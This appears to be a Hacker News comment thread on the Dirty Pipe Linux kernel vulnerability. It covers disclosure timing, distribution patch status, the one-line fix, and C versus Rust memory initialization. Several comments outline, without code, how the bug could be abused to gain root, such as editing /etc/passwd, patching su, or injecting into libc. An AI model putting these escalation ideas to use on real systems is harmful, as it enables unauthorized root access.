Based on the description, sounds like it should be quite possible.


It has been less than a month after fixes emerged for kernels and your PoC exploit has already been released into the public. Should you not have waited at least a bit longer (for example 2 months) before disclosing this vulnerability so that people/companies can keep up with patching? Don't they need more time to patch their servers and legacy etc before this becomes yet another log4j exploitation fest? That is if this really is the new dirty cow vuln.

I get responsible disclosure is important, but should we not give people some more opportunity to patch, which will always take some time?

Just curious.

Also, nice work and interesting find!


It's the absolute opposite. It's insane that this commit wasn't flagged as a patch for a major vulnerability. Why am I finding out about this now? Why is it now my job to comb through commits looking for hidden patches?

It puts me, as a defender, at an insane disadvantage. Attackers have the time, incentives, and skills to look at commits for vulns. I don't. I don't get paid for every commit I look at, I don't get value out of it.

This backwards process pushed by Greg KH and others upstream needs to die ASAP.


Personally, I just enable automatic security updates and forget about it.


Once the commit is in the kernel tree it's effectively public for those looking to exploit it. Combing recent commits for bug fixes for the platform you're targeting is exploitation 101.

The announcement only serves to let the rest of the public know about this and incentivize them to upgrade.


Max did everything right here, and in this case I’m not sure the distribution process exists to have done better.

(Thanks Max for handling this well and politely and for putting up with everyone’s conflicting opinions.)


FWIW, if it in any way comes off like I'm blaming Max for this, I'm not. Anyone blaming Max for how vulnerabilities are disclosed is completely ignorant of the kernel reporting process.


Just wanted to note that your replies come off as quite confrontational/aggressive. I think you have valid points, and it's clear that this topic is important to you, but you're heating up the atmosphere of the thread more than necessary.


That part I'm ok with. Upstream has treated security researchers with contempt for decades.


Why not three months? Why not six? I do not get it. How is this same conversation still happening? This was public the day the patch was sent to the list or pushed to a public git server. Do you think adversaries are sitting around for a POC? Or for you to decide to get around to patching?

I can't help but physically shake my head as I write this. I can't imagine actually asking people to try to play pretend security through obscurity because folks still can be arsed to implement some sort of reasonable update strategy. I have enough experience in tiny and huge shops to say that it's a matter of prioritization and it's just a blatant form of technical debt and poor foresight.


You never know if it was already being exploited, but once thing is sure, once the patch gets merged, it's a race and only a matter of time before an exploit is written. Two weeks is already long and may leave distro users exposed, which is why it's important that it doesn't stay too long in the fridge. Ideally we should have a "patch day" every week that distros would align on. That would allow users to adapt to this and get prepared to applying fixes everywhere without having to wonder about what fix addresses what, and more importantly it would remove the surprise effect. The distros process doesn't make this possible at the moment.


>Let me briefly introduce how our log server works: In the CM4all hosting environment, all web servers (running our custom open source HTTP server) send UDP multicast datagrams with metadata about each HTTP request. These are received by the log servers running Pond, our custom open source in-memory database. A nightly job splits all access logs of the previous day into one per hosted web site, each compressed with zlib.

Via HTTP, all access logs of a month can be downloaded as a single .gz file. Using a trick (which involves Z_SYNC_FLUSH), we can just concatenate all gzipped daily log files without having to decompress and recompress them, which means this HTTP request consumes nearly no CPU. Memory bandwidth is saved by employing the splice() system call to feed data directly from the hard disk into the HTTP connection, without passing the kernel/userspace boundary (“zero-copy”).

Windows users can’t handle .gz files, but everybody can extract ZIP files. A ZIP file is just a container for .gz files, so we could use the same method to generate ZIP files on-the-fly; all we needed to do was send a ZIP header first, then concatenate all .gz file contents as usual, followed by the central directory (another kind of header).

Just want to say, these people are running a pretty impressive operation. Very thoroughly engineered system they have there.


This if f*cking scary. Such a simple code, so dangerous and it works. You can trivially add an extra root user via /etc/{passwd|shadow}. There are tons of options how to p0wn a system.

Please update your devices ASAP!


Eh, it’s a limited subset of kernel versions (ones unlikely to be used in those devices), and requires local execution privileges and access to the file system. Linux in general has had numerous security issues (as has every other OS), often requiring far less access.

Does it need patching? Of course. It’s not a privilege escalation remote code execution issue though, and even if it was, it would be on a tiny fraction of running devices right now.


> and even if it was, it would be on a tiny fraction of running devices right now.

That's correct and I misjudged the situation. Sorry!


Those unsupported devices probably don't run Linux 5.8 or later, they are likely on older versions. It would be really useful to have this vuln on them though, it would help with getting root so you can get control of your own device and install your own choice of OS.


You're right, I though kernel 5.8 is a lot older than it actually is. I've edited my post.

Sorry!


This affects kernels from 5.8 and was fixed in 5.16.11, 5.15.25 and 5.10.102. Exploit code is public and available on the linked page.


It's disturbing that despite prior disclosure on distro lists, Ubuntu doesn't have an update available, with public exploits circulating now.


Debian stable (bullseye) is still vulnerable: https://security-tracker.debian.org/tracker/CVE-2022-0847


That page is not up-to-date, fix was released today:

https://lists.debian.org/debian-security-announce/2022/msg00...


It wasn't available via `apt-get update && apt-get dist-upgrade` as of when I drafted that comment, but I confirm that 5.10.92-2 seems to be released now.


Well the fix was released ~30 minutes ago, so that checks out. ;-)

The security-tracker site is now updated as well.


Others, note that the new archive name is 'stable-security'. You might need to update your pins if you upgraded from Buster and you're not seeing the update now. I put in a pull request to add it to the release notes.


< 5.8 not being affected is probably a saving grace for quite a few enterprises as I'd expect that LTS distributions may not have got that version included as yet.


CentOS 7 is already at 5.10 so it should affect lots of production systems


Are you by chance using a 3rd party kernel repo such as ElRepo to work around a limitation? Or could someone at your org be compiling a custom kernel?


*blinks*

*stares at kernel-3.10.0-1160.59.1.el7*


Is this a smartphone? I'm on 3.18!


How about Ubuntu?


The relevant CVE page returns a 500 error: https://github.com/canonical-web-and-design/ubuntu.com/issue...

21.10 appears to be lacking the patch.


The CVE page returns now, with a whole bunch of "needs triage".

https://ubuntu.com/security/CVE-2022-0847


I’m curious how git bisect was applied here. Wouldn’t you have to compile the whole kernel somehow and then run your test program using that kernel? Is that really what was done here?


Yes? This is faster and easier than you may think it to be. Building a reasonably small kernel only takes ~a minute. People usually have fully automated git-bisect-run scripts for build & test in qemu.


Oh, interesting, did not know it could be so fast.


For me, at least, there's an important difference missing from the debate over the term "C/C++": compiling C code is always much faster than you would expect, but compiling C++ code is always much slower than you would expect...


And yet there's an ongoing effort to optimize the kernel compile time by rearranging all of the headers. On a modern machine with plenty of cores a kernel build is pretty quick, but they're talking about slicing 20% or more off the top.

It's always slower than we'd like.


Perhaps more importantly than being fast, it is scriptable. ("git bisect run" can take a shell command to run and interpret the exit code of, so you could script everything including the kernel recompiles and walk away for a few hours.)


Yes, that's what I did.


The kernel is relatively easy to compile and install, so I would think that's exactly what they did.


Wouldn't this allow modifying a cached version of /sbin/su to nop the password check? This seems really easy to exploit for privilege escalation.


Yes. But you can also inject code into libc.so.6, and all running processes will have it.


Or /etc/passwd


Yes it would. That is implied because writing arbitrary files means you can also edit the permission systems


Excellent work and excellent write up Max. A feather in your cap to be proud of for sure.


Crazy. Just successfully pwnd my homelab box in the garage..

Exciting for the implications of opening many locked down consumer devices out there.

Nightmare for the greater cyber sec world...


> A ZIP file is just a container for .gz files

That doesn't sound right.


GZIP (.gz) and PKZIP (.zip) are both containers for DEFLATE. GZIP is barely a container with minimal metadata, whereas PKZIP supports quite a bit of metadata. Although you can’t quite concatenate GZIP streams to get a PKZIP file, it’s pretty close—if I recall correctly, you just chop off the GZIP header.


I'm past the edit period, but:

> if I recall correctly, you just chop off the GZIP header.

...to get the raw DEFLATE stream, that is. You still need to attach any necessary metadata for PKZIP, which Max mentions. Their approach for converting between the two is pretty clever: it's so elegant and simple that it seems obvious, but I never would have thought of it. Very nifty, @max_k!


Yeah, a gzip file is itself a container for a DEFLATE stream. Gzip files can contain metadata such as timestamps, and comments.


Both PKZIP and gzip use DEFLATE: https://en.wikipedia.org/wiki/Deflate


Reminds me of SunOS 4.1.3 where you simply type in ‘+’ about 127 times at the “Login:” prompt and PRESTO-CHANGO … you get a root shell prompt.


Who says closed source doesn't have benefits?


Does this have a cvss yet? It seems really powerful and easy to exploit. And by easy to exploit I'm talking beginner CTF easy.


Once I fell victim to The Dirty Bong Vulnerability, when the cat knocked the bong over onto my Dell laptop's keyboard. Fortunately I had the extended warranty, and the nice repairwoman just smelled it, laughed at me, and cheerfully replaced the keyboard for free. No way Apple would have ever done that.


Extreme Debugger Par Excellence!

What a supérioritégrandeur!


Amazing write-up! This is a super example of a responsible disclosure.

I mean, compiling 17 kernels alone takes so long that most people would've given up in between.


> most people would've given up in between

Nah, that's the most fun part. Once you have one kernel that works and one that doesn't, you can be pretty sure that you'll eventually find the cause of the bug. The part where I would have given up is the "trying to reproduce" part.


Yeah, 17 loops is a small enough number that is honestly probably not bother figuring out how to automate git bisect and a test.

The real deal was tracking it down and creating a reproducible test.


Depends entirely on what sort of hardware you have. IIRC, I usually spend around 5 minutes when compiling Linux on my desktop, so not instant but not horrible. The agonizing part would be to have to manually install, boot and test those kernels, or to create a setup involving virtual machines which does that automatically to use `git bisect run`.

But yeah, incredibly impressive persistence.


What a poster child. Deserves some kind of award.


I like how they casually mention that they have basically written their entire stack themselves.


>Memory bandwidth is saved by employing the splice() system call to feed data directly from the hard disk into the HTTP connection, without passing the kernel/userspace boundary (“zero-copy”).

What are the memory savings of this splicing approach as compared to streaming [through userspace]?


What does "streaming buffers" mean? splice() avoids copying data from kernel to userspace and back; it stays in the kernel, and often isn't even copied at all, only page references are passed around.


67% savings. If an application reads a 1MB file the normal way, the kernel creates 1MB of buffers in the file system cache to hold the data. Then it copies the data to another 1MB of buffers which are owned by the application. If the application then writes the data out to a network socket, the kernel has to allocate another 1MB buffer to hold the data while it is being sent.

If the application were processing the data in some way, then it would be worth it. Otherwise it is better to skip all of that work.


Wow, awesome debugging - very impressed.


Since so many distros seem to lag a good ways behind on packages, and this vulnerability (in it's easiest exploited form) was introduced in kernel 5.8, it would seem a fair amount of Linux installs wouldn't actually be vulnerable to this. Is that somewhat correct?


Yes - ish. Depends on the distro. Ubuntu 20.04 has 5.4, for example, and I suspect many use that.


Wow, almost 10 months from the first reported file corruption until identification as an exploitable bug.


I'll bite, why the "Wow"?

It was a random, intermittent file corruption that didn't cause real harm to the authors organization and was, clearly, very tricky to track down.


I don't have a basis for how long this might take. As the author mentions "All bugs become shallow once they can be reproduced.", but only after spending probably the largest amount of time waiting for new incident reports to come in, and then analyzing the reports (e.g. to determine most incidents occurred on the last day of the month), and hours staring at application and kernel code. It's very impressive, but certainly the largest amount of time in the 10 month duration was not actually debugging. The "moment of extraordinary clarity" probably sprung out of years of experience.


Ah, I guess my thinking is that they didn't really focus on it. It was annoying but not high priority ... until they started to get an inkling of what was actually going on.


Agreed, about 99% of admins I know would not be able to identify this error, and most likely most Hacker News reads. The last sentence on your post is very true.


If not 99.999%

I’ve worked with (and been) a dev for several decades, and I can count on one hand the number of folks who would have a chance of figuring this out, and 2 fingers the number of folks who WOULD.

Of course, most never try to optimize or go so deep like this that they would ever need to, so there is that!


The sort of bug that could have been caught by unit tests I suppose.


Thank you for not selling this to the "industry"!


The sample code does not demonstrate how to get the page to be flagged dirty so that the kernel actually writes it back to disk. Did I miss something?


I assume you’d trigger a write some other way - if using this to mess with the shadow file, say, change your password at the same time to flush the file.


I think you're quite gifted in story telling, you could be thriller book writer.


Dirty pipe.. how about "sewerbleed"?


The exploit involves DIRTY (should be written back to disk) memory pages attached to a PIPE between processes.


Yes... sewers are dirty pipes. "sewerbleed" is funnier than "dirty pipe", and it matches https://en.wikipedia.org/wiki/Heartbleed.


We all got the reference you were making; the problem is 'heart' 'bleed' is based around what could be considered the heart (rather than as is normally said, the brain) of a computer 'bleeding' data from one context to another.

In both cases the researchers chose sort of punny names that were also self descriptive and obvious once you read how to produce the exploit. 'Dirty Pipe' is literally the recipe for this exploit / corruption. Maybe your name seems funny to you for some reason that isn't obvious / shared.


C needs to die. Pro tip for language designers: require all fields to be initialized any time an object is created.

Really impressive debugging too.


> require all fields to be initialized any time an object is created

I'm not a fan of such a policy. That usually leads to people zero-initializing everything. For this bug, this would have been correct, but sometimes, there is no good "initial" value, and zero is just another random value like all the 2^32-1 others.

Worse, if you zero-initialize everything, valgrind will be unable to find accesses to uninitialized variables, which hides the bug and makes it harder to find. If I have no good initial value for something, I'd rather leave it uninitialized.


> I'm not a fan of such a policy. That usually leads to people zero-initializing everything. For this bug, this would have been correct, but sometimes, there is no good "initial" value, and zero is just another random value like all the 2^32-1 others.

So use a language that has an option type, we've only had them for what, 50 years now.


I think https://news.ycombinator.com/item?id=30588362 has shown that this wouldn't solve anything for this particular case.


Mandatory explicit initialization, plus a feature to explicitly mark memory as having an undefined value, is a great way to approach this problem. You get the benefit in the majority of cases where you have a defined value you just forgot to set and the compiler errors until you set it, and for the "I know it's undefined, I don't have a value for it yet" case you have both mandatory explicit programmer acknowledgement and the opportunity for debug code to detect mistaken reads of this uninitialized memory.

But I think it would be troublesome to use such a hypothetical feature in C if it's only available in some compiler-specific dialect(s), because you need to coerce to any type, so it would be hard to hide to hide behind a macro. What should it expand to on compilers without support? It would probably need lots of variants specific to scalar types, pointer types, etc., or lots of #if blocks, which would be unfortunate.

Zig is a nice language with this feature, and it fits into many of the same use cases as C: https://ziglang.org/documentation/0.9.1/#undefined


Actually, https://news.ycombinator.com/item?id=30588362 has convinced me this wouldn't necessarily solve the bug in question either, since it's a bug caused by (quite legitimately) re-using an existing value. Though it would be easy to implement a "free" operation by just writing `undefined`, so it would still help quite a bit, and more than suggestions like "just use an Optional/Maybe type".


GCC has recently introduced a mode (-ftrivial-auto-var-init) that will zero initialize all automatic variables by default while still treating them as UB for sanitize/warning purposes.

The issue is with dynamic memory allocation as that would be the responsibility of the allocator (and of course the kernel uses custom allocators).


Interesting compiler feature to work around (unknown) vulnerabilities similar to this one. However in this case, it wouldn't help; the initial allocation is with explicit zero-initialization, but this is a circular buffer, and the problem occurs when slots get reused (which is the basic idea of a circular buffer).


Would this get caught by KMSAN (https://github.com/google/kmsan)? Maybe the circular buffer logic would need to get some calls to `__msan_allocated_memory` and/or `__sanitizer_dtor_callback` added to it? If this could be made to work then it would ensure that this bug stays fixed and doesn't regress.


Yes, but as you said, it works only after adding such annotations to various libraries. A circular buffer is just a special kind of memory allocator, and as such, when it allocates and deallocates memory, it needs to tell the sanitizer about it.

What bothers me about the Linux code base is that there is so much code duplication; the pipe doesn't use a generic circular buffer implementation, but instead rolls its own. If you had the one true implementation, you'd add those annotations there, once, and all users would have it, and would benefit from KMSAN's deep insight.

Every time I hack Linux kernel code, I'm reminded how ugly plain C is, how it forces me to repeat myself (unless you enter macro hell, but Linux is already there). I wish the Linux kernel would agree on a subset of C++, which would allow making it much more robust and simpler.

They recently agreed to allow Rust code in certain tail ends of the code base; that's a good thing, but much more would be gained from allowing that subset of C++ everywhere. (Do both. I'm not arguing against Rust.)


Some good abstractions would really help with these kinds of allocators.


Why can't things like option types be used? That solves the issue as you'd either have `Some<FooType>` or `None`, which could be dealt with separately.


I love Rust, but would it have prevented this problem? IIUC there was no memory corruption at the language level here. This was really just a logic error.


Yes, it would have. Some code creates an instance of some struct, but doesn’t set the flags field to zero. It thus keeps whatever value happened to be in that spot in memory, an essentially random set of bits. Rust would force you to either explicitly name the flags field and give it a value, or use `..Default::default()` to initialize all remaining fields automatically. Anything else would be a compile–time error.

The fix:

    +++ b/lib/iov_iter.c
    @@ -414,6 +414,7 @@ static size_t copy_page_to_iter_pipe(struct page \*page, size_t offset, size_t by
       return 0;
    
      buf->ops = &page_cache_pipe_buf_ops;
    + buf->flags = 0;
      get_page(page);
      buf->page = page;
      buf->offset = offset;


No. Rust can not prevent this bug.

The bug is that they are reusing (or, repurposing) an already-allocated-and-used buffer and forgot to reset flags. This is a logic bug, not a memory safety bug.

In fact, this might be a prime example of "using Rust does not magically eliminate your temporal bugs because sometimes they are not about memory safety but logical". Before that my favorite such bug is a Use-After-Free in Redox OS's filesystem codes.

Pro tip for random HN Rust evangelist: read the fucking code before posting your "sHoUlD HAVe uSED A BeTTER lANGUAGE" shit.


This is only partially fair. In Rust you would probably have assigned a new object into *buf here instead of overwriting the fields manually. It is good practice to do this (if the code is logically an object initialization, it should actually be an object initialization, not a bunch of field assignments), but it's clunky to do so in C because you can't use initializers in assignments.


The point is: You could have done this in Rust, but you wouldn't have been required to do so, so the exact same logic bug could have emerged. Maybe it would be more Rust-like to write the code like that, but it would have also been possible to write the code like that in C - and since we're talking about the kernel here, even if this code was written in Rust a developer might have written it in the more C-like way for performance reasons.


People writing C don't re-use allocated objects because it's clunky but to improve performance. The general purpose allocators are almost always much slower than something where you know the pattern of allocations. I've no idea if Rust has a similar issue. I would think that most kernel code, whether C or Rust, would need to handle "allocation fails" case and not depend on language constructs to do allocations, but that's just a guess.


I'm not saying you shouldn't reuse allocated objects. I'm talking about building a local object (no dynamic allocation) and assigning it to the pointer at once. This has the same runtime behavior (assuming -O1) as assigning the fields one by one.

See https://godbolt.org/z/Wh5KcTaGY for what I'm talking about, the local allocation is easily eliminated by the compiler.

The equivalent in C is to create a temporary local variable with an initializer list then write that variable to the pointer.


you can assign a new object into *buf in C just fine, with "*buf = (struct YourType){.prop1 = a, .prop2 = b}"; it even zero-initializes unset fields! So C and Rust give you precisely the same abilities here.

edit: the "struct pipe_buffer" in question[1] has one field that even the updated code doesn't write - "private". Not sure what it's about, but it's there. Not writing unrelated fields like that is probably not much of an issue now, but it certainly can add up on low-power systems. You might also have situations where you'd want to write parts of an object in different parts of the code, for which you'd have to resort to writing fields manually.

[1]: https://github.com/torvalds/linux/blob/719fce7539cd3e186598e...


Oh I was not aware of this syntax in C, thanks for bringing it up! I still think the pattern is more common and known in Rust but I might be wrong :)

Re: your other points, "reusing a pre-allocated struct from a buffer" is basically object initialization, which is different from other times you want to write fields. In general an object initialization construct should be used in those cases, this whole thread being an argument why. Out-of-band fields such as the "private" field are a pain I agree, but they can be separated from an inner struct (in which case the inner struct is the only field that gets assigned for initialization).

Taking a step back, the true solution is probably to have a proper constructor... And that can be done in any language, so I'll stand corrected.


The question of safety is often much more about coding standards than actual language features. For a kernel, you'd be violating Rust's safety features left right and center (or have a slow kernel that just dies on OOM; choose one) and would have to come up with your own standards for preventing coding errors in those, which is what you already have with C.

To be clear, some base level of trivially safe code is certainly a nice-to-have. I just don't think the amount that helps for a kernel is that much, and the added boilerplate on more unsafe things might even obscure issues.


I think you need to have C99 for that, and the kernel is still using C89. If C needs to die, then C89 needs to die first :)


as far as I understand, the kernel uses C89 + GNU extensions, cause there definitely are usages in the kernel of it. (my searching showed it being only used for defining globals, which is a weird standard, but I don't see anything preventing using it elsewhere if they wanted to)

And there are recent plans to move the kernel to a newer C version anyway.


I agree with your sentiment. Only the most strict pure functional languages will prevent you from reusing objects.

You could argue that some languages distinguish raw memory from actual objects and even when reusing memory you would still go through an initialization phase (for example placement new in C++) that would take care of putting the object into a known default state.


> The bug is that they are reusing (or, repurposing) an already-allocated-and-used buffer and forgot to reset flags. This is a logic bug, not a memory safety bug.

This statement is incorrect. They are using an arena allocator, and there is no way for it to know if it is reusing one of the elements or using that element for the first time. To do this in Rust you would probably be using the MaybeUninit type: https://doc.rust-lang.org/std/mem/union.MaybeUninit.html

However, you are partly correct. In Rust, when using the MaybeUninit type, it is still possible to partially initialize an object and then return it as if it were fully initialized without hitting a compile error. https://doc.rust-lang.org/std/mem/union.MaybeUninit.html#ini...

If you do the whole struct at once, rather than one field at a time, then the compiler still has your back:

    let foo = unsafe {
      let mut uninit: MaybeUninit<Foo> = MaybeUninit::uninit();
      uninit.write(Foo {
        name: "Bob".to_string(),
        list: vec![0, 1, 2]
      })
    }


Ah thanks for explaining. I misunderstood the root cause and didn't read the patch. Rust definitely would have helped here. Or even just enforcing modern C practices such as overwriting the whole struct so that non-specified values would have been set to zero (although explicit is better than zero).


Wouldn't Lint have caught the error too?


buf is a pointer to a pipe_buffer array, this whole function wreaks yes, but i don't think this is a simple "initialization would have fixed" bug

buf = &pipe->bufs[i_head & p_mask];

i think it is a problem with merging and needing to reset the flags, but i didn't want to waste too much time really trying to find the root issue and wtf merging is/why do it.


You can't accidentally leave a field of a struct uninitialized in Rust or in other sane languages.


btw. this is how I would make the code more robust: https://lore.kernel.org/lkml/20220225185431.2617232-4-max.ke...

I'm a C++ guy, and the lack of constructors is one of many things that bothers me with C.


I tend to agree but only partially. I'm doing myself a lot of init functions for plenty of stuff, but I've faced plenty of issues due to the fact that these functions do not always initialize everything (and your patch above does exactly that for a good reason) and that it's much less obvious for those using them. And if they initialize too much, they can equally be a pain to work with. It's not uncommon to require 2 or 3 different init functions depending on what you're doing, but the name should explicitly indicate the promise, and that's where it's difficult.


Then let's have those 2 or 3 documented init functions. That's not perfect, but still much better than spraying different (undocumented) copies of the init code everywhere, that have to be located and adjusted every time somebody refactors something.


In any case, definitely ;-)


> Pro tip for language designers: require all fields to be initialized any time an object is created.

This proposal sounds great until you find out that this is a hard problem to solve reasonably well in the compiler and no matter what you do there will be valid programs that your compiler will reject.


No? This seems to work perfectly fine for other languages.

> valid programs that your compiler will reject.

Do you mean "valid programs where everything is initialized when an object is created will somehow fail to detect that"?


>Do you mean "valid programs where everything is initialized when an object is created will somehow fail to detect that"?

Valid programs where a field is left uninitialized at creation time, but the programmer makes sure it's initialized before it's used.


No, I don’t think that this should be considered a valid program. I would never allow any code that creates a partly–initialized struct in any code that I maintain.

I agree that it’s a hard problem, but I don’t think that language designers should use that as an excuse. I think that language designers should really double–down and require that every field be initialized, otherwise people will just forget. The code will be carefully written at first, but then someone new will come along and add a new field, and then the existing code is insufficient. With no errors from the compiler there is no way to ensure that the new programmer updates everything to accommodate the new field.

Rust does pretty well in this regard, but you can still use unsafe blocks to get a partly–initialized struct if you really want one. I like Rust, but I wish that it went all the way and didn’t allow it at all.


Sure, so we can easily change the definition of "valid" so that you have to initialize them at creation time. shrug


Google's Fuchsia/Zircon cannot come fast enough.


I wouldn't expect additional security from introducing an entirely new OS/kernel. Just unknown RCEs and other vulnerabilities waiting to be discovered.


Just like Linux so no change there, We still need to move on.


Because they use formal methods preventing this kind of thing from happening?


Even with your formal methods strawman, vulnerabilities like these are still possible in Linux and C. We need to move on.


You can formally verify C code against a spec though.


Why not seL4 then?




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: